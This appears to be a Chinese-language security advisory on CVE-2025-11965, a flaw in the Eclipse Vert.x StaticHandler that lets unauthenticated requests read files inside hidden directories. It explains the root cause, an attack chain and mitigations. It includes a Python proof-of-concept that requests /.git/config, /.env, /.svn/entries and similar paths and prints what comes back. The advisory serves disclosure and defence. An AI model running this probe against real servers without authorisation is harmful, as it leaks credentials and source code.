CVE-2025-11965 Eclipse Vert.x StaticHandler隐藏目录访问绕过漏洞

漏洞信息

漏洞编号

CVE-2025-11965

漏洞类型

路径遍历/安全配置绕过

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Eclipse Vert.x

漏洞概述

CVE-2025-11965是Eclipse Vert.x框架中StaticHandler组件存在的一个安全配置绕过漏洞。该漏洞影响Vert.x的4.0.0至4.5.21版本以及5.0.0至5.0.4版本。Vert.x是一个用于在JVM上构建响应式应用程序的工具包，广泛用于构建高性能的Web应用程序和微服务。

StaticHandler是Vert.x Web模块中的一个核心组件，用于提供静态文件服务，例如HTML页面、CSS样式表、JavaScript文件、图片等资源。该组件通常包含一项安全配置，用于限制对隐藏文件（以点号'.'开头的文件和目录，如.git、.svn、.htaccess等）的访问，以防止敏感信息泄露。

然而，该漏洞的核心问题在于：StaticHandler的配置仅正确限制了直接访问隐藏文件（如访问/.gitignore），但未能有效限制对隐藏目录内部文件的访问。这意味着攻击者可以通过构造特定路径来绕过安全检查，成功检索隐藏目录中的文件内容，例如访问/.git/config路径即可获取Git仓库的配置文件，其中可能包含远程仓库地址、用户信息等敏感数据。

该漏洞的CVSS评分为7.5，属于高危级别。攻击者无需认证即可通过网络远程利用，且不需要用户交互。漏洞主要影响机密性，攻击者可读取服务器上的敏感配置文件，但不会对系统完整性和可用性造成直接影响。

技术细节

从技术层面分析，该漏洞的根因在于StaticHandler在处理静态文件请求时的路径过滤逻辑存在缺陷。

Vert.x的StaticHandler通过setIncludeHidden(boolean)方法来控制是否允许访问隐藏文件。当该配置设为false时，框架应当在路径解析阶段检查路径中的每个目录段和文件名是否以点号'.'开头，如果是则拒绝访问。

然而，在受影响的版本中，StaticHandler的过滤逻辑仅检查了路径的最终文件名（basename）是否为隐藏文件，而未递归检查路径中的中间目录是否为隐藏目录。例如：
- 访问/.gitignore → 正确拦截（因为文件名.gitignore以点开头）
- 访问/.git/config → 未拦截（因为最终文件名config不以点开头，但中间目录.git是隐藏目录）

这种不完整的检查逻辑导致了安全配置绕过的可能。攻击者只需在URL路径中包含隐藏目录名称加上斜杠和目标文件名，即可绕过限制访问隐藏目录内的任意文件。

利用方式非常简单：攻击者通过HTTP GET请求访问类似http://target/.git/config的URL，即可读取服务器上.git目录中的config文件。如果服务器部署在包含版本控制系统元数据的目录中（如.git、.svn、.hg等），攻击者可能获取源码仓库信息、用户凭证、远程仓库地址等敏感数据，进一步可能导致源代码泄露或供应链攻击。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过扫描目标服务器，识别其使用Eclipse Vert.x框架及StaticHandler组件提供静态文件服务。

STEP 2

步骤2：构造恶意请求

攻击者构造HTTP GET请求，在URL路径中包含隐藏目录名称（如/.git/config、/.svn/entries等），利用StaticHandler未检查中间目录的缺陷。

STEP 3

步骤3：绕过安全限制

由于StaticHandler仅检查最终文件名而非路径中的所有目录段，隐藏目录内的文件请求被错误放行，成功绕过setIncludeHidden(false)的安全配置。

STEP 4

步骤4：敏感信息泄露

攻击者成功读取.git/config等敏感文件，获取远程仓库地址、用户凭证等关键信息，可能进一步导致源代码泄露或供应链攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11965 PoC - Eclipse Vert.x StaticHandler Hidden Directory Access Bypass
# This PoC demonstrates how to bypass StaticHandler's hidden file restriction
# to access files within hidden directories (e.g., .git/config)

import requests

target_url = "http://target-server:8080"

# Attempt to access files within hidden directories
# The vulnerability allows reading files inside hidden directories
# even when setIncludeHidden(false) is configured

hidden_paths = [
    "/.git/config",          # Git repository configuration
    "/.git/HEAD",            # Git HEAD reference
    "/.svn/entries",         # SVN metadata
    "/.env",                 # Environment configuration file
    "/.htaccess",            # Apache configuration
    "/.gitignore",           # Direct hidden file (should be blocked)
]

for path in hidden_paths:
    url = f"{target_url}{path}"
    try:
        response = requests.get(url, timeout=10)
        if response.status_code == 200 and len(response.content) > 0:
            print(f"[+] ACCESS GRANTED: {url}")
            print(f"    Content preview: {response.text[:200]}")
            print(f"    Status: {response.status_code}, Length: {len(response.content)}")
        elif response.status_code == 403 or response.status_code == 404:
            print(f"[-] ACCESS DENIED: {url} (Status: {response.status_code})")
        else:
            print(f"[?] UNEXPECTED: {url} (Status: {response.status_code})")
    except requests.exceptions.RequestException as e:
        print(f"[!] ERROR for {url}: {e}")
    print("-" * 60)

# Expected behavior: All hidden paths should be blocked
# Vulnerable behavior: Paths like /.git/config are accessible
# while /.gitignore is properly blocked

影响范围

Eclipse Vert.x >= 4.0.0, < 4.5.21

Eclipse Vert.x >= 5.0.0, < 5.0.4

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）在反向代理（如Nginx、Apache）或Web应用防火墙层面添加规则，拒绝所有包含隐藏目录路径（如/.git/、/.svn/、/.hg/等）的请求；2）从部署目录中移除所有版本控制系统元数据目录；3）在应用层面添加自定义过滤器，在请求到达StaticHandler之前检查URL路径中是否包含以点号开头的目录段；4）监控Web服务器访问日志，及时发现异常的隐藏目录访问请求。